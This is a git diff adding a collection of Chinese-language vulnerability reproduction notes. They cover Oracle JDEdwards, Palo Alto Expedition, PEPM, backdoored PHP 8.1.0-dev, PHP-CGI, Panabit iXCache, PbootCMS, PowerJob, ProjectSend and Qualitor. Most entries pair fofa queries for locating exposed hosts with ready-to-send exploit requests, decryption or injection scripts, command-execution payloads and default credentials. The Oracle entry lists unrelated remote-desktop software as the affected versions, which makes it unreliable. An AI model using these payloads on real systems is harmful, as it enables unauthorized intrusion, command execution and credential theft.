diff --git a/OracleJDEdwardsEnterpriseOneTools存在未授权获取管理员密码漏洞.md b/OracleJDEdwardsEnterpriseOneTools存在未授权获取管理员密码漏洞.md new file mode 100644 index 0000000..0c5e5f4 --- /dev/null +++ b/OracleJDEdwardsEnterpriseOneTools存在未授权获取管理员密码漏洞.md 
@@ -0,0 +1,130 @@ +# Oracle JDEdwards EnterpriseOne Tools存在未授权获取管理员密码漏洞 + +## 一、漏洞描述 +Oracle JDEdwards EnterpriseOne Tools存在未授权获取管理员密码漏洞 + +## 二、影响版本 ++ 向日葵个人版 for Windows <=11.0.0.33162版本 ++ 向日葵简约版 <= V1.0.1.43315(2021.12) + +## 三、漏洞测绘 +```java +port:8999 product:"Oracle WebLogic Server" +``` + +![1724335620619-317416d9-24aa-4545-bad4-a3067a469dc3.png](./img/ijf-qz3AGTo6YYJz/1724335620619-317416d9-24aa-4545-bad4-a3067a469dc3-184659.png) + +## 四、漏洞复现 +![1724335643682-e9e0b518-1460-4da8-8273-2df3d3a1a767.png](./img/ijf-qz3AGTo6YYJz/1724335643682-e9e0b518-1460-4da8-8273-2df3d3a1a767-754624.png) + +使用下面解密脚本解密 + +```java +python3 poc.py --string ACHCJKFKHCJKKKJJIBBOCDPIHOEJIICHDGHGJEBABEAG +``` + +![1724335765028-42f80ff5-85e2-4f31-a6f9-70dfbbb2151c.png](./img/ijf-qz3AGTo6YYJz/1724335765028-42f80ff5-85e2-4f31-a6f9-70dfbbb2151c-572268.png) + +```java +import base64 +import argparse +import subprocess +from Crypto.Cipher import AES +from Crypto.Util.Padding import unpad + +def main(): + # Display ASCII art + print(""" + ______ ______ ___ ___ ___ ___ ___ ________ ____ + / ___/ | / / __/___|_ |/ _ \|_ |/ _ \____|_ /_ /_ /|_ / + / /__ | |/ / _//___/ __// // / __// // /___/ __/ / //_ <_/_ < + \___/ |___/___/ /____/\___/____/\___/ /____//_/____/____/ + """) + + # Parse command-line arguments + parser = argparse.ArgumentParser(description='Decrypt a given string.') + parser.add_argument('--string', help='The string to be decrypted') + parser.add_argument('--target', help='The target URL to fetch the string from') + args = parser.parse_args() + + if args.target: + # Fetch the response from the target URL + response = fetch_target_string_with_curl(args.target) + if response: + input_str = response + print(f"Fetched string from target: {input_str}") + else: + print("No valid string found in the response.") + return + elif args.string: + input_str = args.string + else: + print("You must provide either --string or --target.") + return + + # Decrypt the string + array_of_bytes = 
jde_decipher(input_str.encode("UTF-8")) + print("Decrypted string:", array_of_bytes.decode("UTF-8")) + +def fetch_target_string_with_curl(target_url): + try: + # Use curl to fetch the target URL with SSL verification disabled + result = subprocess.run(['curl', '-k', target_url], capture_output=True, text=True) + if result.returncode == 0: + response_text = result.stdout.strip() + print("Response received:") + print(response_text) # Print for debugging + return response_text + else: + print(f"curl failed with return code {result.returncode}") + return None + except Exception as e: + print(f"Failed to fetch from target using curl: {e}") + return None + +def jde_decipher(param_array_of_bytes): + array_of_bytes_1 = show_buffer(param_array_of_bytes) + array_of_bytes_2 = base64.b64decode(array_of_bytes_1) + return array_of_bytes_2 + +def show_buffer(param_array_of_bytes): + array_of_bytes_1 = bytearray(len(param_array_of_bytes) // 2) + for j in range(len(array_of_bytes_1)): + i = 2 * j + array_of_bytes_1[j] = ((param_array_of_bytes[i] - 65) << 4) + (param_array_of_bytes[i + 1] - 65) + + if array_of_bytes_1[0] != 2: + raise Exception("Invalid version for net showBuffer") + + array_of_bytes_2 = bytearray(16) + array_of_bytes_3 = bytearray(16) + gen_keys(array_of_bytes_2, array_of_bytes_3, array_of_bytes_1[3]) + + cipher = AES.new(array_of_bytes_2, AES.MODE_CBC, iv=array_of_bytes_3) + array_of_bytes_4 = unpad(cipher.decrypt(bytes(array_of_bytes_1[6:])), AES.block_size) + + return array_of_bytes_4 + +def gen_keys(param_array_of_bytes_1, param_array_of_bytes_2, param_byte): + array_of_bytes_1 = bytearray([65, 4, 95, 12, 88, 41, 6, 114, 119, 93, 37, 68, 75, 19, 49, 46]) + array_of_bytes_2 = bytearray([107, 34, 26, 94, 68, 41, 119, 48, 3, 88, 28, 97, 5, 127, 77, 54]) + array_of_bytes_3 = bytearray([36, 89, 113, 109, 38, 15, 7, 66, 76, 115, 16, 53, 106, 94, 27, 56]) + + j = param_byte >> 4 + k = param_byte & 0xF + m = array_of_bytes_3[j] + for i in range(16): + 
param_array_of_bytes_1[i] = array_of_bytes_1[i] ^ m + + m = array_of_bytes_3[k] + for i in range(16): + param_array_of_bytes_2[i] = array_of_bytes_2[i] ^ m + +if __name__ == "__main__": + main() +``` + + + +> 更新: 2024-09-05 23:27:57 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pmvkhnz91qoo3axw> \ No newline at end of file diff --git a/PAN未授权SQL注入漏洞复现(CVE-2024-9465).md b/PAN未授权SQL注入漏洞复现(CVE-2024-9465).md new file mode 100644 index 0000000..aab8842 --- /dev/null +++ b/PAN未授权SQL注入漏洞复现(CVE-2024-9465).md 
@@ -0,0 +1,87 @@ +# PAN未授权SQL注入漏洞复现(CVE-2024-9465) + +Palo Alto Networks Expedition中存在的一个SQL注入漏洞POC及漏洞细节已经公开,该漏洞允许未经验证的攻击者获取Expedition数据库内容,例如密码哈希、用户名、设备配置和设备API密钥,利用这一点,攻击者还可以在Expedition 系统上创建和读取任意文件。 + +### 影响范围 + +Palo Alto Networks Expedition < 1.2.96 + +## fofa + +```javascript +title="Expedition Project" +``` + +## poc + +```javascript +POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded + +action=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(5)))test) +``` + +![image-20241012114501096](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121145181.png) + +## python脚本 + +```python +#!/usr/bin/python3 +import argparse +import requests +import urllib3 +import sys +import time +urllib3.disable_warnings() + + +def create_checkpoint_table(url: str): + print(f'[*] Creating Checkpoint database table...') + data = {'action': 'get', + 'type': 'existing_ruleBases', + 'project': 'pandbRBAC', + } + r = requests.post(f'{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php', data=data, verify=False, timeout=30) + if r.status_code == 200 and 'ruleBasesNames' in r.text: + print(f'[*] Successfully created the database table') + return + + print(f'[-] Unexpected response creating table: {r.status_code}:{r.text}') + sys.exit(1) + + +def inject_checkpoint_query(url: str): + start_time = time.time() + print(f'[*] Injecting 10 second sleep payload into database query...') + data = {'action': 'import', + 'type': 'test', + 'project': 'pandbRBAC', + 'signatureid': '1 AND (SELECT 1234 FROM (SELECT(SLEEP(10)))horizon3)', + } + r = requests.post(f'{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php', data=data, verify=False, timeout=30) + execution_time = time.time() - start_time + if r.status_code == 200 and execution_time > 9 and execution_time < 15: + print(f'[*] Successfully sent injection payload!') + print(f'[+] Target is vulnerable, 
request took {execution_time} seconds') + return + + print(f'[-] Unexpected response sending injection payload: {r.status_code}:{r.text}') + sys.exit(1) + + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + parser.add_argument('-u', '--url', help='The URL of the target', type=str, required=True) + args = parser.parse_args() + + create_checkpoint_table(args.url) + inject_checkpoint_query(args.url) + +``` + + + +## 漏洞来源 + +- https://github.com/horizon3ai/CVE-2024-9465 \ No newline at end of file diff --git a/PEPM系统Cookie请求头存在远程代码执行漏洞.md b/PEPM系统Cookie请求头存在远程代码执行漏洞.md new file mode 100644 index 0000000..ae568a6 --- /dev/null +++ b/PEPM系统Cookie请求头存在远程代码执行漏洞.md 
@@ -0,0 +1,30 @@ +# PEPM系统Cookie请求头存在远程代码执行漏洞 + +# 一、漏洞简介 +PEPM系统Cookie请求头存在远程代码执行漏洞 + +# 二、影响版本 ++ PEPM + +# 三、资产测绘 +```plain +header="pepm" +``` + +![1722876330531-484a89d0-0030-4c38-8bd0-27e97936adc2.png](./img/tlp0y6fKN60Y2V4W/1722876330531-484a89d0-0030-4c38-8bd0-27e97936adc2-803339.png) + +# 四、漏洞复现 +```plain +GET / HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 +Cookie: auth=a%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A45%3A%221%29%7B%7D%7D%7D%3B%20ob_clean%28%29%3Bsystem%28%27whoami%27%29%3Bdie%28%29%3B%20%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7D%7D%7D +Connection: close +``` + +![1722876371652-4bd33bb8-1302-438d-83bd-ef957bef3490.png](./img/tlp0y6fKN60Y2V4W/1722876371652-4bd33bb8-1302-438d-83bd-ef957bef3490-729318.png) + + + +> 更新: 2024-08-12 17:15:57 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tqiapo8b4781kprv> \ No newline at end of file diff --git a/PHP-8.1.0-devzerodium后门命令执行漏洞.md b/PHP-8.1.0-devzerodium后门命令执行漏洞.md new file mode 100644 index 0000000..847419e --- /dev/null +++ b/PHP-8.1.0-devzerodium后门命令执行漏洞.md 
@@ -0,0 +1,30 @@ +# PHP-8.1.0-dev zerodium后门命令执行漏洞 + +# 一、漏洞简介 +PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送`User-Agentt`头来执行任意代码。 + +# 二、影响版本 ++ PHP/8.1.0-dev + +# 三、资产测绘 ++ fofa`"PHP/8.1.0-dev"` ++ 特征 + +![1696168261552-13f55cc9-34bf-4a45-b935-812435375e09.png](./img/NF04CG2inYN-Es8-/1696168261552-13f55cc9-34bf-4a45-b935-812435375e09-358972.png) + +# 四、漏洞复现 +```plain +GET / HTTP/1.1 +Host: xx.xx.xx.xx +User-Agentt: zerodiumsystem("cat /etc/passwd"); +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +``` + +![1696168333495-01ed0a8c-814b-48b8-94bf-dd024eb424c7.png](./img/NF04CG2inYN-Es8-/1696168333495-01ed0a8c-814b-48b8-94bf-dd024eb424c7-736557.png) + + + +> 更新: 2024-09-05 23:27:24 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wr81rdntsr6nz25n> \ No newline at end of file diff --git a/PHPCGIWindows平台远程代码执行漏洞(CVE-2024-4577).md b/PHPCGIWindows平台远程代码执行漏洞(CVE-2024-4577).md new file mode 100644 index 0000000..34bd922 --- /dev/null +++ b/PHPCGIWindows平台远程代码执行漏洞(CVE-2024-4577).md 
@@ -0,0 +1,40 @@ +# PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577) + +# 一、漏洞简介 +<font style="color:rgb(53, 53, 53);">PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码。</font> + +# 二、影响版本 +```java +PHP 8.3 < 8.3.8 +PHP 8.2 < 8.2.20 +PHP 8.1 < 8.1.29 +利用条件: +1、用户认证:无需用户认证 +2、前置条件:默认配置 +3、触发方式:远程 +``` + +# 三、资产测绘 ++ fofa`app="XAMPP" ` ++ 特征 + +![1717781448311-7a65fa38-1b93-46b2-866e-bc4080028b76.png](./img/kDk7tGfPzFbz3N1v/1717781448311-7a65fa38-1b93-46b2-866e-bc4080028b76-703129.png) + +# 四、漏洞复现 +```java +POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1 +Host: +REDIRECT-STATUS:1 +Content-type: text/html; charset=UTF-8 +Content-Type: application/x-www-form-urlencoded +Content-Length: 29 + +<?php system("whoami")?> +``` + +![1717781553755-883046d2-ce02-4bcc-95fe-c4c98e0f1bae.png](./img/kDk7tGfPzFbz3N1v/1717781553755-883046d2-ce02-4bcc-95fe-c4c98e0f1bae-406115.png) + + + +> 更新: 2024-09-05 23:27:24 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tihl0itqro7zdhy5> \ No newline at end of file diff --git a/Panabit iXCache网关RCE漏洞CVE-2023-38646.md b/Panabit iXCache网关RCE漏洞CVE-2023-38646.md index f069124..803372e 100644 --- a/Panabit iXCache网关RCE漏洞CVE-2023-38646.md +++ b/Panabit iXCache网关RCE漏洞CVE-2023-38646.md @@ -8,7 +8,4 @@ Content-Type: application/x-www-form-urlencoded Content-Length: 107 ntpserver=0.0.0.0%3Bwhoami&year=2000&month=08&day=15&hour=11&minute=34&second=53&ifname=fxp1 - - - ``` diff --git a/Panabit-iXCache网关RCE漏洞CVE-2023-38646.md b/Panabit-iXCache网关RCE漏洞CVE-2023-38646.md new file mode 100644 index 0000000..803372e --- /dev/null +++ b/Panabit-iXCache网关RCE漏洞CVE-2023-38646.md 
@@ -0,0 +1,11 @@ +## Panabit iXCache网关RCE漏洞CVE-2023-38646 +``` +POST /cgi-bin/Maintain/date_config HTTP/1.1 +Host: 127.0.0.1:8443 +Cookie: pauser_9667402_260=paonline_admin_44432_9663; pauser_9661348_661=paonline_admin_61912_96631 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 +Content-Type: application/x-www-form-urlencoded +Content-Length: 107 + +ntpserver=0.0.0.0%3Bwhoami&year=2000&month=08&day=15&hour=11&minute=34&second=53&ifname=fxp1 +``` diff --git a/PanabitiXCacheajax_cmd存在后台命令执行漏洞.md b/PanabitiXCacheajax_cmd存在后台命令执行漏洞.md new file mode 100644 index 0000000..374c28b --- /dev/null +++ b/PanabitiXCacheajax_cmd存在后台命令执行漏洞.md 
@@ -0,0 +1,43 @@ +# Panabit iXCache ajax_cmd存在后台命令执行漏洞 + +# 一、漏洞简介 +panabit缓存加速产品是一款基于派网公司自研的操作系统(PanaOS)上研发的内容缓存产品。iXCache依靠高稳定性、高可靠性两大特点,可缓存丰富的资源,目前支持Web视频、移动视频、Web音乐、移动音乐、软件下载、应用商店、游戏补丁等八大类资源的缓存。部署灵活、支持交换机镜像和Panabit牵引两种模式,满足不同级别的用户需求。panabit iXCache系统ajax_cmd存在命令执行漏洞,攻击者通过漏洞可以执行任意命令,导致服务器失陷。 + +# 二、影响版本 ++ Panabit iXCache + +# 三、资产测绘 ++ fofa`<font style="color:rgb(255, 0, 0);">title="iXCache"</font>` ++ 特征 + +![1706801330303-6f77b29b-5337-4c00-9d58-6227a29488d7.png](./img/dxmkz2REfz98ryF9/1706801330303-6f77b29b-5337-4c00-9d58-6227a29488d7-202725.png) + +# 四、漏洞复习 +1. 使用弱口令`admin/ixcache`登陆系统,获取cookie + +![1706801386353-66163cd9-4b54-4c2e-a39f-4d386894b78f.png](./img/dxmkz2REfz98ryF9/1706801386353-66163cd9-4b54-4c2e-a39f-4d386894b78f-952342.png) + +2. 使用上一步获取的cookie,执行命令 + +```plain +POST /cgi-bin/Maintain/ajax_cmd?action=runcmd&cmd=ls HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +X-Requested-With: XMLHttpRequest +Connection: keep-alive +Cookie: _walkthrough-introduction=0; pauser_1706355982_749237=paonline_admin_54360_17068008921; pauser_965865545_617716=paonline_admin_59195_9663105331; pauser_1628486854_900424=paonline_admin_84071_16289322461 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Content-Length: 0 +``` + +![1706801708864-338c6ff8-4078-44a8-aa0a-e73d784b7807.png](./img/dxmkz2REfz98ryF9/1706801708864-338c6ff8-4078-44a8-aa0a-e73d784b7807-973503.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/provn8b8ocqxex5v> \ No newline at end of file diff --git a/PanabitiXCachedate_config存在后台命令执行漏洞.md b/PanabitiXCachedate_config存在后台命令执行漏洞.md new file mode 100644 index 0000000..8362397 --- /dev/null +++ b/PanabitiXCachedate_config存在后台命令执行漏洞.md 
@@ -0,0 +1,39 @@ +# Panabit iXCache date_config存在后台命令执行漏洞 + +# 一、漏洞简介 +panabit缓存加速产品是一款基于派网公司自研的操作系统(PanaOS)上研发的内容缓存产品。iXCache依靠高稳定性、高可靠性两大特点,可缓存丰富的资源,目前支持Web视频、移动视频、Web音乐、移动音乐、软件下载、应用商店、游戏补丁等八大类资源的缓存。部署灵活、支持交换机镜像和Panabit牵引两种模式,满足不同级别的用户需求。panabit iXCache系统date_config存在命令执行漏洞,攻击者通过漏洞可以执行任意命令,导致服务器失陷。 + +# 二、影响版本 ++ Panabit iXCache + +# 三、资产测绘 ++ fofa`<font style="color:rgb(255, 0, 0);">title="iXCache"</font>` ++ 特征 + +![1706801330303-6f77b29b-5337-4c00-9d58-6227a29488d7.png](./img/okCSs9cCa7o9RLED/1706801330303-6f77b29b-5337-4c00-9d58-6227a29488d7-147741.png) + +# 四、漏洞复习 +1. 使用弱口令`admin/ixcache`登陆系统,获取cookie + +![1706801386353-66163cd9-4b54-4c2e-a39f-4d386894b78f.png](./img/okCSs9cCa7o9RLED/1706801386353-66163cd9-4b54-4c2e-a39f-4d386894b78f-179934.png) + +2. 使用上一步获取的cookie,执行命令(每次发包需要在登录处重新获取一次cookie) + +```plain +POST /cgi-bin/Maintain/date_config HTTP/1.1 +Host: +Cookie: pauser_1626709857_644740=paonline_admin_48217_16289319551;Path=/; +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 +Cookie: pauser_1706355982_749237=paonline_admin_54360_17068008921; pauser_965865545_617716=paonline_admin_59195_9663105331 +Content-Type: application/x-www-form-urlencoded +Content-Length: 107 + +ntpserver=0.0.0.0;ls&year=2021&month=08&day=14&hour=17&minute=04&second=50&tz=Asiz&bcy=Shanghai&ifname=fxp1 +``` + +![1706801467914-c7d947fa-0610-4ec2-95fc-93f6dace587b.png](./img/okCSs9cCa7o9RLED/1706801467914-c7d947fa-0610-4ec2-95fc-93f6dace587b-495631.png) + + + +> 更新: 2024-02-29 23:57:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pm3gifvcepzx9xkc> \ No newline at end of file diff --git a/PanabitiXCache存在默认口令.md b/PanabitiXCache存在默认口令.md new file mode 100644 index 0000000..c31e68b --- /dev/null +++ b/PanabitiXCache存在默认口令.md 
@@ -0,0 +1,23 @@ +# Panabit iXCache 存在默认口令 + +# 一、漏洞简介 +panabit缓存加速产品是一款基于派网公司自研的操作系统(PanaOS)上研发的内容缓存产品。iXCache依靠高稳定性、高可靠性两大特点,可缓存丰富的资源,目前支持Web视频、移动视频、Web音乐、移动音乐、软件下载、应用商店、游戏补丁等八大类资源的缓存。部署灵活、支持交换机镜像和Panabit牵引两种模式,满足不同级别的用户需求。Panabit iXCache 存在默认口令 + +# 二、影响版本 ++ Panabit iXCache + +# 三、资产测绘 ++ fofa`<font style="color:rgb(255, 0, 0);">title="iXCache"</font>` ++ 特征 + +![1706801330303-6f77b29b-5337-4c00-9d58-6227a29488d7.png](./img/DS47HuGXtP19Igwy/1706801330303-6f77b29b-5337-4c00-9d58-6227a29488d7-404712.png) + +# 四、漏洞复习 +使用弱口令`admin/ixcache`登陆系统,获取cookie + +![1706801386353-66163cd9-4b54-4c2e-a39f-4d386894b78f.png](./img/DS47HuGXtP19Igwy/1706801386353-66163cd9-4b54-4c2e-a39f-4d386894b78f-080334.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pc0sdgk5q8mpzpy2> \ No newline at end of file diff --git a/Panel-loadfile-后台文件读取漏洞.md b/Panel-loadfile-后台文件读取漏洞.md new file mode 100644 index 0000000..767f98c --- /dev/null +++ b/Panel-loadfile-后台文件读取漏洞.md @@ -0,0 +1,5 @@ +## Panel loadfile 后台文件读取漏洞 +``` +POST /api/v1/file/loadfile +{"paht":"/etc/passwd"} +``` diff --git a/PbootCMS接口entrance.php存在SQL注入漏洞.md b/PbootCMS接口entrance.php存在SQL注入漏洞.md new file mode 100644 index 0000000..5aa710f --- /dev/null +++ b/PbootCMS接口entrance.php存在SQL注入漏洞.md 
@@ -0,0 +1,23 @@ +# PbootCMS接口entrance.php存在SQL注入漏洞 + +由于PbootCMS entrance.php 文件代码逻辑缺陷存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息 + +## fofa + +```javascript +header="PbootCMS" || body="zbeol.com" +``` + +## poc + +```javascript +POST /?tag=%7d%73%71%6c%3a%20%20%7b%70%62%6f%6f%74%3a%6c%69%73%74%20%66%69%6c%74%65%72%3d%31%3d%32%29%55%4e%49%4f%4e%28%53%45%4c%45%43%54%2f%2a%2a%2f%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%28%73%65%6c%65%63%74%2f%2a%2a%2f%76%65%72%73%69%6f%6e%28%29%29%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%29%2f%2a%2a%2f%23%2f%2a%2a%2f%7c%31%32%33%20%73%63%6f%64%65%3d%31%32%33%7d%5b%6c%69%73%74%3a%6c%69%6e%6b%20%6c%69%6e%6b%3d%61%73%64%5d%7b%2f%70%62%6f%6f%74%3a%6c%69%73%74%7d HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20241211210840708](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112108781.png) \ No newline at end of file diff --git a/PowerJob信息泄漏漏洞(CVE-2023-29923).md b/PowerJob信息泄漏漏洞(CVE-2023-29923).md new file mode 100644 index 0000000..905727e --- /dev/null +++ b/PowerJob信息泄漏漏洞(CVE-2023-29923).md 
@@ -0,0 +1,37 @@ +# PowerJob信息泄漏漏洞(CVE-2023-29923) + +# 一、漏洞简介 +PowerJob是一个开源分布式计算和作业调度框架,它允许开发人员在自己的应用程序中轻松调度任务。PowerJob V4.3.1版本存在安全漏洞,该漏洞源于存在不正确访问控制。 + +# 二、影响版本 ++ PowerJob V4.3.1 + +# 三、资产测绘 ++ fofa`title="PowerJob"` ++ 特征 + +![1707132393105-46d6ce0f-8016-4a1d-a308-ac83ac3d0f6d.png](./img/s1SqmcSJTTrhY2SJ/1707132393105-46d6ce0f-8016-4a1d-a308-ac83ac3d0f6d-433908.png) + +# 四、漏洞复现 +```plain +POST /job/list HTTP/1.1 +Host: +Connection: close +Content-Length: 69 +Content-Type: application/json +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 + + +{ + "appId":1, + "index":0, + "pageSize":10 +} +``` + +![1707132481225-23a54101-d385-47d4-b739-42c3ec090ad9.png](./img/s1SqmcSJTTrhY2SJ/1707132481225-23a54101-d385-47d4-b739-42c3ec090ad9-885295.png) + + + +> 更新: 2024-02-29 23:55:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mcit5dukx60xrcrx> \ No newline at end of file diff --git a/ProjectSend身份认证绕过漏洞(CVE-2024-11680).md b/ProjectSend身份认证绕过漏洞(CVE-2024-11680).md new file mode 100644 index 0000000..991d0ca --- /dev/null +++ b/ProjectSend身份认证绕过漏洞(CVE-2024-11680).md 
@@ -0,0 +1,131 @@ +# ProjectSend身份认证绕过漏洞(CVE-2024-11680) + +PrојесtSеnd版本在r1720之前受到不当认证漏洞的影响,远程未经认证的攻击者可以通过发送精心制作的HTTP请求到орtiоnѕ.рhр来利用这个缺陷,从而未经授权地修改应用程序的配置,成功利用允许攻击者创建账户、上传ԝеbѕhеllѕ,并嵌入恶意JаvаSсript。 + +## fofa + +```javascript +body="ProjectSend" +``` + +## nuclei_poc + +```yaml +id: projectsend-auth-bypass + +info: + name: ProjectSend <= r1605 - Improper Authorization + author: DhiyaneshDK + severity: high + description: | + An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application. + reference: + - https://www.projectsend.org/ + - https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf + metadata: + verified: true + max-request: 1 + fofa-query: body="ProjectSend" + shodan-query: html:"ProjectSend" + tags: misconfig,projectsend,auth-bypass,intrusive + +variables: + string: "{{randstr}}" + +flow: http(1) && http(2) && http(3) && http(4) && http(5) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "projectsend")' + condition: and + internal: true + + extractors: + - type: regex + name: csrf + group: 1 + regex: + - 'name="csrf_token" value="([0-9a-z]+)"' + internal: true + + - type: regex + name: title + group: 1 + regex: + - '<title>Log in » ([0-9a-zA-Z]+)<\/title>' + internal: true + + - raw: + - | + POST /options.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrf_token={{csrf}}§ion=general&this_install_title={{string}} + + matchers: + - type: dsl + dsl: + - 'status_code == 500' + - 'contains(content_type, "text/html")' + condition: and + internal: true + + - raw: + - | + GET / HTTP/1.1 
+ Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "{{string}}")' + condition: and + internal: true + + - raw: + - | + POST /options.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrf_token={{csrf}}§ion=general&this_install_title={{title}} + + matchers: + - type: dsl + dsl: + - 'status_code == 500' + - 'contains(content_type, "text/html")' + condition: and + internal: true + + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "{{title}}")' + condition: and + +# digest: 4b0a00483046022100daa2dba9e143fabb75766c67df507d5f0c405097db09624ce331213630ab1354022100ba972f4e1e7dca2d28077ef7f00c1198fd67ef41126ef47d00b5d8db77a78b4a:922c64590222798bb761d5b6d8e72950 +``` + + + +## 漏洞来源 + +- https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/projectsend-auth-bypass.yaml +- https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf \ No newline at end of file diff --git a/QualitorcheckAcesso.php存在任意文件上传漏洞.md b/QualitorcheckAcesso.php存在任意文件上传漏洞.md new file mode 100644 index 0000000..e37351f --- /dev/null +++ b/QualitorcheckAcesso.php存在任意文件上传漏洞.md 
@@ -0,0 +1,67 @@ +# Qualitor checkAcesso.php存在任意文件上传漏洞 + +# 一、漏洞简介 +Qualitor checkAcesso.php存在任意文件上传漏洞 + +# 二、影响版本 ++ Qualitor + +# 三、资产测绘 ++ fofa`app="Qualitor-Web"` ++ 特征 + +![1727509167970-d543fa15-b1c4-40b9-91b1-f7e9d6b79657.png](./img/YpPPegF7LDDl-noY/1727509167970-d543fa15-b1c4-40b9-91b1-f7e9d6b79657-467073.png) + +# 四、漏洞复现 +```java +POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1 +Host: +Content-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849 + +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; name="idtipo" + +2 +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; name="nmfilestorage" + + +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; name="nmdiretoriorede" + +. +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; 